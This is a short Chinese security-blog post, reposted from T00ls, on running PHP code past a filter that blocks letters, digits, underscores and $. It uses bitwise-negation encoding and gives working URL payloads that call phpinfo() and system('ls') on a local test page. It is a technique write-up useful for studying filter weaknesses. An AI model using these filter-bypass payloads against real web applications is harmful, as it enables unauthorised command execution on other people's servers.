【奇技淫巧】无字母数字webshell简单利用

  • A+
所属分类:安全文章

【奇技淫巧】无字母数字webshell简单利用


前几天看到这个

【奇技淫巧】无字母数字webshell简单利用

正则过滤了大小写、数字、下划线、$

参考p牛的文章

https://www.leavesongs.com/PENET ... thout-alphanum.html
https://www.leavesongs.com/PENET ... hanum-advanced.html
尝试利用取反的方法进行代码执行,本地环境PHP 7.0.20-2
简单写了句生成payload代码:


【奇技淫巧】无字母数字webshell简单利用

之后构造请求:
http://localhost/test.php?code=(~%8F%97%8F%96%91%99%90)();

【奇技淫巧】无字母数字webshell简单利用

执行ls测试一下:
http://localhost/test.php?code=(~%8c%86%8c%8b%9a%92)(~%93%8c);

【奇技淫巧】无字母数字webshell简单利用

【奇技淫巧】无字母数字webshell简单利用



本文始发于微信公众号(T00ls):【奇技淫巧】无字母数字webshell简单利用

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: